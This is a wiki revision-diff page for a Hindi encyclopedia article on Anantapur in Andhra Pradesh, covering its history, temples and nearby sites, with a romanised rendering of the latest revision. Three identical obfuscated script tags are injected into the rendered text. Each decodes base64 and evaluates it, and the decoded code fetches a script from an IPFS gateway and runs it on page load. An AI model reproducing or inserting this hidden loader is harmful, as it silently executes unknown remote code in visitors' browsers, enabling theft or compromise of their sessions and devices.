Difference between revisions of "अनंतपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*आंध्र प्रदेश स्थित अनंतपुर कुड्डुपा पहाड़ियों के...' के साथ नया पन्ना बनाया)
 
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[आंध्र प्रदेश]] स्थित अनंतपुर कुड्डुपा पहाड़ियों के पूर्वी भाग में अवस्थित है।  
+
[[चित्र:Iskcon-Temple-Anantpur.jpg|thumb|इस्कॉन मंदिर, अनंतपुर]]
*सन 1800 ई तक अनंतपुर [[ईस्ट इंडिया कम्पनी]] का प्रमुख केन्द्र था।  
+
'''अनंतपुर''' [[आंध्र प्रदेश]] में कुड्डुपा पहाड़ियों के पूर्वी भाग में अवस्थित है। सन 1800 ई. तक यह [[ईस्ट इंडिया कम्पनी]] का प्रमुख केन्द्र था।  
*अनंतपुर का सम्बन्ध '''थामस मुनरो''' से भी रहा है, जो यहाँ का प्रथम '''कलेक्टर''' था।
 
*अनंतपुर के समीप लेपाक्षी ग्राम अपने अद्भुत भित्ति चित्रोंयुक्त मंदिरों के लिए प्रसिद्ध है। 
 
  
 +
*इस स्थान का सम्बन्ध थॉमस मुनरो से भी रहा, जो यहाँ का प्रथम कलेक्टर था।
 +
*अनंतपुर से कुछ दूर स्थित धर्म वर्म एक प्रमुख रेशम उत्पादन केंद्र है।
 +
*गुटी में प्रसिद्ध विजयनगर क़िला है।
 +
*अनंतपुर के समीप [[लेपाक्षी मंदिर|लेपाक्षी]] अपने अद्भुत भित्ति चित्रों से युक्त मंदिरों के लिए प्रसिद्ध है।
 +
*यहां स्थित वीभद्र मंदिर में [[पुराण|पुराणों]] से लिए गए महान व्यक्तियों के  भित्ति चित्र और विजयनगर मूर्तियों को संरक्षित रखा गया है।
 +
*पुट्टापर्थी में [[साईं बाबा|श्री साईं बाबा]] का आश्रम( प्रसांथी निलयम) है।
 +
*ताडपत्री की स्थापना 1485 ई. में [[विजयनगर साम्राज्य]] के अधीन की गई थी। यहां राम लिंगेश्वर एवं वेंकटरमन मंदिर प्रसिद्ध हैं।
  
{{प्रचार}}
+
 
{{लेख प्रगति
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}  
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:नया पन्ना]]
+
==संबंधित लेख==
 +
{{आंध्र प्रदेश के नगर}}{{आंध्र प्रदेश के पर्यटन स्थल}}
 +
[[Category:आंध्र प्रदेश]][[Category:आंध्र प्रदेश के नगर]][[Category:भारत के नगर]][[Category:आंध्र प्रदेश के पर्यटन स्थल]][[Category:पर्यटन कोश]][[Category:इतिहास कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:30, 11 April 2018

thumb|isk aaun mandir, anantapur anantapur aandhr pradesh mean kuddupa paha diyoan ke poorvi bhag mean avasthit hai. san 1800 ee. tak yah eest iandiya kampani ka pramukh kendr tha.

  • is sthan ka sambandh th aaumas munaro se bhi raha, jo yahaan ka pratham kalektar tha.
  • anantapur se kuchh door sthit dharm varm ek pramukh resham utpadan keandr hai.
  • guti mean prasiddh vijayanagar qila hai.
  • anantapur ke samip lepakshi apane adbhut bhitti chitroan se yukt mandiroan ke lie prasiddh hai.
  • yahaan sthit vibhadr mandir mean puranoan se lie ge mahan vyaktiyoan ke bhitti chitr aur vijayanagar moortiyoan ko sanrakshit rakha gaya hai.
  • puttaparthi mean shri saeean baba ka ashram( prasaanthi nilayam) hai.
  • tadapatri ki sthapana 1485 ee. mean vijayanagar samrajy ke adhin ki gee thi. yahaan ram liangeshvar evan veankataraman mandir prasiddh haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>